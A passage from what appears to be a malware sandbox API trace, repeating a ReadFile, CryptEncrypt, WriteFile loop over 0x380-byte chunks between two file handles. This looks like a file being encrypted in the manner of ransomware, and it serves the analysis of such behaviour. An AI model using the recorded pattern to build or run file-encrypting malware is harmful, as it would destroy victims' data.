nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.500] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.501] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.502] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.503] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.504] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.505] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.506] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, 